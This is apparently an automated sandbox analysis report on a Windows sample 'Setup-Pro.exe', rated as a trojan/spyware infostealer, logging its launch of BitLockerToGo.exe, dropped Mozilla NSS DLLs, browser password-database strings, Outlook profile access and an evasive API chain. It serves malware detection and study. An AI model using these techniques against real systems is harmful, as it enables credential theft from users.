1\Device\NamedPipe\cygwinGODEBUG sys/cpu: value "", required CPU feature
                    Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@3/27@0/1
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_6CCD7030 GetLastError,FormatMessageA,__acrt_iob_func,__acrt_iob_func,__acrt_iob_func,fflush,LocalFree,2_2_6CCD7030
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_03019600 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,2_2_03019600
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_03013720 CoCreateInstance,MultiByteToWideChar,lstrcpyn,2_2_03013720
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\BW7MTRYF.htmJump to behavior
                    Source: C:\Users\user\Desktop\Setup-Pro.exeFile created: C:\Users\user\AppData\Local\Temp\jsii-runtime.775329715Jump to behavior
                    Source: Setup-Pro.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: C:\Users\user\Desktop\Setup-Pro.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                    Source: softokn3[1].dll.2.dr, softokn3.dll.2.drBinary or memory string: CREATE TABLE metaData (id PRIMARY KEY UNIQUE ON CONFLICT REPLACE, item1, item2);
                    Source: BitLockerToGo.exe, 00000002.00000002.1858771961.000000006CEAF000.00000002.00000001.01000000.00000007.sdmp, BitLockerToGo.exe, 00000002.00000002.1858303161.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000002.1847494467.000000001D530000.00000004.00000020.00020000.00000000.sdmp, nss3[1].dll.2.dr, nss3.dll.2.drBinary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
                    Source: softokn3[1].dll.2.dr, softokn3.dll.2.drBinary or memory string: SELECT ALL * FROM %s LIMIT 0;
                    Source: BitLockerToGo.exe, 00000002.00000002.1858771961.000000006CEAF000.00000002.00000001.01000000.00000007.sdmp, BitLockerToGo.exe, 00000002.00000002.1858303161.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000002.1847494467.000000001D530000.00000004.00000020.00020000.00000000.sdmp, nss3[1].dll.2.dr, nss3.dll.2.drBinary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
                    Source: BitLockerToGo.exe, 00000002.00000002.1858771961.000000006CEAF000.00000002.00000001.01000000.00000007.sdmp, BitLockerToGo.exe, 00000002.00000002.1858303161.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000002.1847494467.000000001D530000.00000004.00000020.00020000.00000000.sdmp, nss3[1].dll.2.dr, nss3.dll.2.drBinary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
                    Source: BitLockerToGo.exe, 00000002.00000002.1858771961.000000006CEAF000.00000002.00000001.01000000.00000007.sdmp, BitLockerToGo.exe, 00000002.00000002.1858303161.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000002.1847494467.000000001D530000.00000004.00000020.00020000.00000000.sdmp, nss3[1].dll.2.dr, nss3.dll.2.drBinary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
                    Source: softokn3[1].dll.2.dr, softokn3.dll.2.drBinary or memory string: UPDATE %s SET %s WHERE id=$ID;
                    Source: softokn3[1].dll.2.dr, softokn3.dll.2.drBinary or memory string: SELECT ALL * FROM metaData WHERE id=$ID;
                    Source: softokn3[1].dll.2.dr, softokn3.dll.2.drBinary or memory string: SELECT ALL id FROM %s WHERE %s;
                    Source: softokn3[1].dll.2.dr, softokn3.dll.2.drBinary or memory string: INSERT INTO metaData (id,item1) VALUES($ID,$ITEM1);
                    Source: softokn3[1].dll.2.dr, softokn3.dll.2.drBinary or memory string: INSERT INTO %s (id%s) VALUES($ID%s);
                    Source: BitLockerToGo.exe, 00000002.00000002.1858771961.000000006CEAF000.00000002.00000001.01000000.00000007.sdmp, BitLockerToGo.exe, 00000002.00000002.1858303161.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000002.1847494467.000000001D530000.00000004.00000020.00020000.00000000.sdmp, nss3[1].dll.2.dr, nss3.dll.2.drBinary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
                    Source: BitLockerToGo.exe, 00000002.00000002.1858771961.000000006CEAF000.00000002.00000001.01000000.00000007.sdmp, BitLockerToGo.exe, 00000002.00000002.1858303161.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000002.1847494467.000000001D530000.00000004.00000020.00020000.00000000.sdmp, nss3[1].dll.2.dr, nss3.dll.2.drBinary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
                    Source: BitLockerToGo.exe, 00000002.00000002.1858303161.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000002.1847494467.000000001D530000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE x(addr INT,opcode TEXT,p1 INT,p2 INT,p3 INT,p4 TEXT,p5 INT,comment TEXT,subprog TEXT,stmt HIDDEN);
                    Source: softokn3[1].dll.2.dr, softokn3.dll.2.drBinary or memory string: INSERT INTO metaData (id,item1,item2) VALUES($ID,$ITEM1,$ITEM2);
                    Source: BitLockerToGo.exe, 00000002.00000003.1654256732.00000000235E9000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1671794352.00000000235DC000.00000004.00000020.00020000.00000000.sdmp, IDHIDBAEGIIIDHJKEGDB.2.dr, CBGCAFIIECBFIDHIJKFB.2.drBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                    Source: BitLockerToGo.exe, 00000002.00000002.1858303161.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000002.1847494467.000000001D530000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
                    Source: softokn3[1].dll.2.dr, softokn3.dll.2.drBinary or memory string: SELECT ALL * FROM %s LIMIT 0;CREATE TEMPORARY TABLE %s AS SELECT * FROM %sD
                    Source: BitLockerToGo.exe, 00000002.00000002.1858303161.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000002.1847494467.000000001D530000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE x(type TEXT,schema TEXT,name TEXT,wr INT,subprog TEXT,stmt HIDDEN);
                    Source: softokn3[1].dll.2.dr, softokn3.dll.2.drBinary or memory string: SELECT DISTINCT %s FROM %s where id=$ID LIMIT 1;
                    Source: Setup-Pro.exeString found in binary or memory: proto: oneof field has nil valueproto: don't know how to copy %vproto: required field %q not setproto: bad default uint32 %q: %vproto: bad default uint64 %q: %vstdtime is not time.Time, but %Ttimestamp: %#v before 0001-01-01timestamp: %#v after 10000-01-01instanceInitiatedShutdownBehavioraws-cdk-lib.aws_ec2.CfnNatGatewayaws-cdk-lib.aws_ec2.CfnNetworkAclattrNetworkInsightsAccessScopeArnaws-cdk-lib.aws_ec2.CfnPrefixListaws-cdk-lib.aws_ec2.CfnRouteTableaws-cdk-lib.aws_ec2.CfnVPNGatewayattrVerifiedAccessTrustProviderIdaws-cdk-lib.aws_ec2.Ipv6Addressesaws-cdk-lib.aws_ec2.MultipartBodyaws-cdk-lib.aws_ec2.PrivateSubnetaws-cdk-lib.aws_ec2.SecurityGroupaws-cdk-lib.aws_ec2.VpnConnectionWINDOWS_SERVER_2016_ENGLISH_TESLAWINDOWS_SERVER_2019_ENGLISH_TESLAaws-cdk-lib.aws_ec2.AclCidrConfigaws-cdk-lib.aws_ec2.AddressFamilyInstanceInitiatedShutdownBehaviorAttrNetworkInsightsAccessScopeArnaws-cdk-lib.aws_ec2.CfnRoutePropsAttrVerifiedAccessTrustProviderIdaws-cdk-lib.aws_ec2.GatewayConfigaws-cdk-lib.aws_ec2.IMachineImageaws-cdk-lib.aws_ec2.IPublicSubnetaws-cdk-lib.aws_ec2.InstanceClassaws-cdk-lib.aws_ec2.InstancePropsaws-cdk-lib.aws_ec2.KeyPairFormataws-cdk-lib.aws_ec2.VpcAttributesrelease of handle with refcount 0crypto/aes: output not full blockbytes.Buffer.Grow: negative countbytes.Reader.Seek: invalid whencetoo many levels of symbolic linksInitializeProcThreadAttributeListImage base beyond allowed addressThunk AddressOfData beyond limitsCentral Kurdish Iraq (ku-Arab-IQ)Norwegian (Bokmal) Norway (nb-NO)could not find signer certificateinvalid VS_VERSION_INFO block. %ssync: RUnlock of unlocked RWMutexslice bounds out of range [%x:%y]runtime: memory allocated by OS [misrounded allocation in sysAllocconcurrent map read and map writeruntime: failed to decommit pages/cpu/classes/gc/pause:cpu-seconds/cpu/classes/gc/total:cpu-seconds/gc/limiter/last-enabled:gc-cycle/memory/classes/heap/stacks:bytes/memory/classes/heap/unused:bytes/sched/pauses/stopping/gc:seconds/sched/pauses/total/other:secondsmin must be a non-zero power of 2runtime: failed mSpanList.insert runtime: castogscanstatus oldval=stoplockedm: inconsistent lockingfindrunnable: negative nmspinningfreeing stack not in a stack spanstackalloc not on scheduler stackruntime: goroutine stack exceeds runtime: text offset out of rangetimer period must be non-negativetoo many concurrent timer firingsruntime: name offset out of rangeruntime: type offset out of rangereflect: slice index out of rangereflect: NumOut of non-func type of method on nil interface valuereflect: Field index out of rangereflect: array index out of rangereflect.Value.Equal: invalid Kind to pointer to array with length go package net: confVal.netCgo = application/x-www-form-urlencodedcrypto: requested hash function #Float.GobDecode: buffer too smallx509: invalid RSA public exponentx509: SAN rfc822Name is malformedx509: invalid extended key usagesSigEd25519 no Ed25519 collisions
                    Source: Setup-Pro.exeString found in binary or memory: proto: oneof field has nil valueproto: don't know how to copy %vproto: required field %q not setproto: bad default uint32 %q: %vproto: bad default uint64 %q: %vstdtime is not time.Time, but %Ttimestamp: %#v before 0001-01-01timestamp: %#v after 10000-01-01instanceInitiatedShutdownBehavioraws-cdk-lib.aws_ec2.CfnNatGatewayaws-cdk-lib.aws_ec2.CfnNetworkAclattrNetworkInsightsAccessScopeArnaws-cdk-lib.aws_ec2.CfnPrefixListaws-cdk-lib.aws_ec2.CfnRouteTableaws-cdk-lib.aws_ec2.CfnVPNGatewayattrVerifiedAccessTrustProviderIdaws-cdk-lib.aws_ec2.Ipv6Addressesaws-cdk-lib.aws_ec2.MultipartBodyaws-cdk-lib.aws_ec2.PrivateSubnetaws-cdk-lib.aws_ec2.SecurityGroupaws-cdk-lib.aws_ec2.VpnConnectionWINDOWS_SERVER_2016_ENGLISH_TESLAWINDOWS_SERVER_2019_ENGLISH_TESLAaws-cdk-lib.aws_ec2.AclCidrConfigaws-cdk-lib.aws_ec2.AddressFamilyInstanceInitiatedShutdownBehaviorAttrNetworkInsightsAccessScopeArnaws-cdk-lib.aws_ec2.CfnRoutePropsAttrVerifiedAccessTrustProviderIdaws-cdk-lib.aws_ec2.GatewayConfigaws-cdk-lib.aws_ec2.IMachineImageaws-cdk-lib.aws_ec2.IPublicSubnetaws-cdk-lib.aws_ec2.InstanceClassaws-cdk-lib.aws_ec2.InstancePropsaws-cdk-lib.aws_ec2.KeyPairFormataws-cdk-lib.aws_ec2.VpcAttributesrelease of handle with refcount 0crypto/aes: output not full blockbytes.Buffer.Grow: negative countbytes.Reader.Seek: invalid whencetoo many levels of symbolic linksInitializeProcThreadAttributeListImage base beyond allowed addressThunk AddressOfData beyond limitsCentral Kurdish Iraq (ku-Arab-IQ)Norwegian (Bokmal) Norway (nb-NO)could not find signer certificateinvalid VS_VERSION_INFO block. %ssync: RUnlock of unlocked RWMutexslice bounds out of range [%x:%y]runtime: memory allocated by OS [misrounded allocation in sysAllocconcurrent map read and map writeruntime: failed to decommit pages/cpu/classes/gc/pause:cpu-seconds/cpu/classes/gc/total:cpu-seconds/gc/limiter/last-enabled:gc-cycle/memory/classes/heap/stacks:bytes/memory/classes/heap/unused:bytes/sched/pauses/stopping/gc:seconds/sched/pauses/total/other:secondsmin must be a non-zero power of 2runtime: failed mSpanList.insert runtime: castogscanstatus oldval=stoplockedm: inconsistent lockingfindrunnable: negative nmspinningfreeing stack not in a stack spanstackalloc not on scheduler stackruntime: goroutine stack exceeds runtime: text offset out of rangetimer period must be non-negativetoo many concurrent timer firingsruntime: name offset out of rangeruntime: type offset out of rangereflect: slice index out of rangereflect: NumOut of non-func type of method on nil interface valuereflect: Field index out of rangereflect: array index out of rangereflect.Value.Equal: invalid Kind to pointer to array with length go package net: confVal.netCgo = application/x-www-form-urlencodedcrypto: requested hash function #Float.GobDecode: buffer too smallx509: invalid RSA public exponentx509: SAN rfc822Name is malformedx509: invalid extended key usagesSigEd25519 no Ed25519 collisions
                    Source: C:\Users\user\Desktop\Setup-Pro.exeFile read: C:\Users\user\Desktop\Setup-Pro.exeJump to behavior
                    Source: unknownProcess created: C:\Users\user\Desktop\Setup-Pro.exe "C:\Users\user\Desktop\Setup-Pro.exe"
                    Source: C:\Users\user\Desktop\Setup-Pro.exeProcess created: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
                    Source: C:\Users\user\Desktop\Setup-Pro.exeProcess created: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\Setup-Pro.exeSection loaded: powrprof.dllJump to behavior
                    Source: C:\Users\user\Desktop\Setup-Pro.exeSection loaded: umpdc.dllJump to behavior
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: rstrtmgr.dllJump to behavior
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: ncrypt.dllJump to behavior
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: ntasn1.dllJump to behavior
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: mswsock.dllJump to behavior
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: winnsi.dllJump to behavior
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: dpapi.dllJump to behavior
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: ntmarta.dllJump to behavior
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: mozglue.dllJump to behavior
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: wsock32.dllJump to behavior
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: vcruntime140.dllJump to behavior
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: msvcp140.dllJump to behavior
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: windowscodecs.dllJump to behavior
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32Jump to behavior
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\13.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001Jump to behavior
                    Source: Setup-Pro.exeStatic PE information: Virtual size of .text is bigger than: 0x100000
                    Source: Setup-Pro.exeStatic file information: File size 24551424 > 1048576
                    Source: Setup-Pro.exeStatic PE information: Raw size of .text is bigger than: 0x100000 < 0x92ce00
                    Source: Setup-Pro.exeStatic PE information: Raw size of .rdata is bigger than: 0x100000 < 0xd56e00
                    Source: Setup-Pro.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                    Source: Binary string: mozglue.pdbP source: BitLockerToGo.exe, 00000002.00000002.1858544781.000000006CCED000.00000002.00000001.01000000.00000008.sdmp, mozglue[1].dll.2.dr, mozglue.dll.2.dr
                    Source: Binary string: freebl3.pdb source: freebl3.dll.2.dr, freebl3[1].dll.2.dr
                    Source: Binary string: freebl3.pdbp source: freebl3.dll.2.dr, freebl3[1].dll.2.dr
                    Source: Binary string: nss3.pdb@ source: BitLockerToGo.exe, 00000002.00000002.1858771961.000000006CEAF000.00000002.00000001.01000000.00000007.sdmp, nss3[1].dll.2.dr, nss3.dll.2.dr
                    Source: Binary string: BitLockerToGo.pdb source: Setup-Pro.exe, 00000000.00000003.1507758122.000000000299A000.00000004.00001000.00020000.00000000.sdmp
                    Source: Binary string: softokn3.pdb@ source: softokn3[1].dll.2.dr, softokn3.dll.2.dr
                    Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: vcruntime140.dll.2.dr, vcruntime140[1].dll.2.dr
                    Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: msvcp140.dll.2.dr, msvcp140[1].dll.2.dr
                    Source: Binary string: nss3.pdb source: BitLockerToGo.exe, 00000002.00000002.1858771961.000000006CEAF000.00000002.00000001.01000000.00000007.sdmp, nss3[1].dll.2.dr, nss3.dll.2.dr
                    Source: Binary string: mozglue.pdb source: BitLockerToGo.exe, 00000002.00000002.1858544781.000000006CCED000.00000002.00000001.01000000.00000008.sdmp, mozglue[1].dll.2.dr, mozglue.dll.2.dr
                    Source: Binary string: BitLockerToGo.pdbGCTL source: Setup-Pro.exe, 00000000.00000003.1507758122.000000000299A000.00000004.00001000.00020000.00000000.sdmp
                    Source: Binary string: softokn3.pdb source: softokn3[1].dll.2.dr, softokn3.dll.2.dr
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_03019C10 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,2_2_03019C10
                    Source: Setup-Pro.exeStatic PE information: section name: .symtab
                    Source: softokn3[1].dll.2.drStatic PE information: section name: .00cfg
                    Source: freebl3.dll.2.drStatic PE information: section name: .00cfg
                    Source: freebl3[1].dll.2.drStatic PE information: section name: .00cfg
                    Source: mozglue.dll.2.drStatic PE information: section name: .00cfg
                    Source: mozglue[1].dll.2.drStatic PE information: section name: .00cfg
                    Source: msvcp140.dll.2.drStatic PE information: section name: .didat
                    Source: msvcp140[1].dll.2.drStatic PE information: section name: .didat
                    Source: nss3.dll.2.drStatic PE information: section name: .00cfg
                    Source: nss3[1].dll.2.drStatic PE information: section name: .00cfg
                    Source: softokn3.dll.2.drStatic PE information: section name: .00cfg
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_0301B035 push ecx; ret 2_2_0301B048
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_6CCAB536 push ecx; ret 2_2_6CCAB549
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile created: C:\ProgramData\mozglue.dllJump to dropped file
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile created: C:\ProgramData\nss3.dllJump to dropped file
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\NCK9WNDU\msvcp140[1].dllJump to dropped file
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\NCK9WNDU\mozglue[1].dllJump to dropped file
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile created: C:\ProgramData\msvcp140.dllJump to dropped file
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile created: C:\ProgramData\freebl3.dllJump to dropped file
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\NCK9WNDU\freebl3[1].dllJump to dropped file
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile created: C:\ProgramData\vcruntime140.dllJump to dropped file
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\NCK9WNDU\softokn3[1].dllJump to dropped file
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\NCK9WNDU\vcruntime140[1].dllJump to dropped file
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\NCK9WNDU\nss3[1].dllJump to dropped file
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile created: C:\ProgramData\softokn3.dllJump to dropped file
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile created: C:\ProgramData\mozglue.dllJump to dropped file
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile created: C:\ProgramData\nss3.dllJump to dropped file
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile created: C:\ProgramData\msvcp140.dllJump to dropped file
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile created: C:\ProgramData\freebl3.dllJump to dropped file
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile created: C:\ProgramData\vcruntime140.dllJump to dropped file
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile created: C:\ProgramData\softokn3.dllJump to dropped file
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_03019C10 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,2_2_03019C10
                    Source: C:\Users\user\Desktop\Setup-Pro.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

                    Malware Analysis System Evasion

                    barindex
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeEvasive API call chain: GetUserDefaultLangID, ExitProcessgraph_2-57178
